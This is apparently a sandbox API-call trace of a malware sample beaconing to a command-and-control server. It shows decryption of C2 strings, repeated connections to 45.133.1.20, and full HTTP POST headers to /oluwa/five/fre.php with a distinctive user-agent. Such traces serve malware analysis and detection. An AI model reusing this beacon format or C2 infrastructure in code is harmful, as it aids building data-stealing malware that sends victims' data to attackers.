(lpLibFileName="user32") returned 0x75640000 [0173.145] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0173.145] GetProcessHeap () returned 0x6a0000 [0173.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0173.146] GetProcessHeap () returned 0x6a0000 [0173.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0173.148] GetProcessHeap () returned 0x6a0000 [0173.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0173.148] GetProcessHeap () returned 0x6a0000 [0173.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0173.149] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0173.150] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0173.150] GetProcessHeap () returned 0x6a0000 [0173.150] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0173.150] GetProcessHeap () returned 0x6a0000 [0173.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0173.151] send (s=0x370, buf=0x6bbd20*, len=242, flags=0) returned 242 [0173.152] send (s=0x370, buf=0x6bb998*, len=159, flags=0) returned 159 [0173.152] GetProcessHeap () returned 0x6a0000 [0173.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0173.152] recv (in: s=0x370, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0173.235] GetProcessHeap () returned 0x6a0000 [0173.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0173.236] GetProcessHeap () returned 0x6a0000 [0173.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0173.236] GetProcessHeap () returned 0x6a0000 [0173.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0173.237] GetProcessHeap () returned 0x6a0000 [0173.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0173.237] closesocket (s=0x370) returned 0 [0173.238] GetProcessHeap () returned 0x6a0000 [0173.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0173.238] GetProcessHeap () returned 0x6a0000 [0173.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0173.239] GetProcessHeap () returned 0x6a0000 [0173.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0173.239] GetProcessHeap () returned 0x6a0000 [0173.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0173.240] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x5b4) returned 0x370 [0173.242] Sleep (dwMilliseconds=0xea60) [0173.245] GetProcessHeap () returned 0x6a0000 [0173.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0173.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.248] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0173.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.362] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0173.414] GetProcessHeap () returned 0x6a0000 [0173.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9de8 [0173.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.416] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b9de8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0173.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.417] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0173.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.608] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0173.608] GetProcessHeap () returned 0x6a0000 [0173.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9de8 | out: hHeap=0x6a0000) returned 1 [0173.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.611] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0173.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.668] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0173.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.669] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0173.669] GetProcessHeap () returned 0x6a0000 [0173.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0173.671] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0173.672] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0173.672] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0173.673] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0173.673] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0173.674] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0173.674] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0173.675] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0173.675] GetProcessHeap () returned 0x6a0000 [0173.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0173.675] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0173.675] GetProcessHeap () returned 0x6a0000 [0173.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0173.676] GetProcessHeap () returned 0x6a0000 [0173.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0173.676] GetProcessHeap () returned 0x6a0000 [0173.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0173.677] GetProcessHeap () returned 0x6a0000 [0173.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0173.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.678] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0173.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.686] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0173.692] GetProcessHeap () returned 0x6a0000 [0173.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0173.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.694] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0173.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.695] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0173.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.696] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0173.696] GetProcessHeap () returned 0x6a0000 [0173.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0173.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.698] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0173.698] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.699] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0173.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.700] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0173.700] GetProcessHeap () returned 0x6a0000 [0173.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0173.700] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0173.701] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0173.701] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0173.701] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0173.702] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0173.703] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0173.704] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0173.705] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0173.705] GetProcessHeap () returned 0x6a0000 [0173.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0173.705] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ba068*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be8f8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0173.705] GetProcessHeap () returned 0x6a0000 [0173.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0173.705] socket (af=2, type=1, protocol=6) returned 0x374 [0173.705] connect (s=0x374, name=0x6be8f8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0173.730] FreeAddrInfoW (pAddrInfo=0x6ba068*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be8f8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0173.730] GetProcessHeap () returned 0x6a0000 [0173.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0173.730] GetProcessHeap () returned 0x6a0000 [0173.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0173.731] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0173.731] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0173.732] GetProcessHeap () returned 0x6a0000 [0173.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0173.732] GetProcessHeap () returned 0x6a0000 [0173.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0173.732] GetProcessHeap () returned 0x6a0000 [0173.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0173.732] GetProcessHeap () returned 0x6a0000 [0173.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0173.733] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0173.734] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0173.734] GetProcessHeap () returned 0x6a0000 [0173.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0173.734] GetProcessHeap () returned 0x6a0000 [0173.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0173.734] send (s=0x374, buf=0x6bbd20*, len=242, flags=0) returned 242 [0173.735] send (s=0x374, buf=0x6bb998*, len=159, flags=0) returned 159 [0173.735] GetProcessHeap () returned 0x6a0000 [0173.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0173.735] recv (in: s=0x374, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0173.819] GetProcessHeap () returned 0x6a0000 [0173.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0173.819] GetProcessHeap () returned 0x6a0000 [0173.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0173.820] GetProcessHeap () returned 0x6a0000 [0173.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0173.821] GetProcessHeap () returned 0x6a0000 [0173.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0173.821] closesocket (s=0x374) returned 0 [0173.822] GetProcessHeap () returned 0x6a0000 [0173.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0173.822] GetProcessHeap () returned 0x6a0000 [0173.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0173.823] GetProcessHeap () returned 0x6a0000 [0173.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0173.823] GetProcessHeap () returned 0x6a0000 [0173.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0173.824] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x9ac) returned 0x374 [0173.826] Sleep (dwMilliseconds=0xea60) [0173.827] GetProcessHeap () returned 0x6a0000 [0173.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0173.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.830] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0173.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.839] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0173.847] GetProcessHeap () returned 0x6a0000 [0173.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0173.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.848] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0173.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.849] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0173.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.850] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0173.850] GetProcessHeap () returned 0x6a0000 [0173.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0174.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.019] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0174.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.021] CryptDestroyKey (hKey=0x6ad020) returned 1 [0174.022] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.022] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0174.022] GetProcessHeap () returned 0x6a0000 [0174.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0174.025] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.025] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0174.026] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.026] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0174.028] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.029] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0174.029] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.030] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0174.030] GetProcessHeap () returned 0x6a0000 [0174.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0174.030] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0174.031] GetProcessHeap () returned 0x6a0000 [0174.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0174.031] GetProcessHeap () returned 0x6a0000 [0174.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0174.032] GetProcessHeap () returned 0x6a0000 [0174.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0174.032] GetProcessHeap () returned 0x6a0000 [0174.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0174.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.034] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0174.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.043] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0174.051] GetProcessHeap () returned 0x6a0000 [0174.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0174.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.053] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0174.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.054] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0174.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.055] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0174.055] GetProcessHeap () returned 0x6a0000 [0174.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0174.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.057] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0174.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.058] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0174.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.059] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0174.059] GetProcessHeap () returned 0x6a0000 [0174.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0174.060] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.061] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0174.062] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.062] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0174.063] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.063] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0174.064] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.064] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0174.064] GetProcessHeap () returned 0x6a0000 [0174.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0174.065] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ba0b8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0174.065] GetProcessHeap () returned 0x6a0000 [0174.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa20 [0174.065] socket (af=2, type=1, protocol=6) returned 0x378 [0174.065] connect (s=0x378, name=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0174.104] FreeAddrInfoW (pAddrInfo=0x6ba0b8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0174.104] GetProcessHeap () returned 0x6a0000 [0174.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0174.104] GetProcessHeap () returned 0x6a0000 [0174.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0174.105] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0174.106] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0174.106] GetProcessHeap () returned 0x6a0000 [0174.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0174.106] GetProcessHeap () returned 0x6a0000 [0174.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0174.107] GetProcessHeap () returned 0x6a0000 [0174.107] RtlAllocateHeap 